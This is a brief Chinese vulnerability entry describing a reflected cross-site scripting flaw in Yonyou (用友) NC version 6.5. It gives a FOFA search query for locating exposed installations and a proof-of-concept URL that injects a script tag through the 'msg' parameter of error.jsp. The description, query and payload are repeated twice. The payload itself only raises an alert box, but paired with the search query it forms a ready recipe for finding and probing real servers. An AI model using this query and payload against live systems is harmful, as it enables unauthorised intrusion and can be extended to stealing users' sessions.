用友NC v6.5 反射型xss
漏洞描述
用友NC6.5版本存在反射型xss
漏洞复现
fofa语法:app="用友-UFIDA-NC"
访问页面:
POC:
/uapws/pages/error.jsp?msg=<script>alert(1)</script>
用友NC6.5版本存在反射型xss
fofa语法:app="用友-UFIDA-NC"
访问页面:
POC:
/uapws/pages/error.jsp?msg=<script>alert(1)</script>
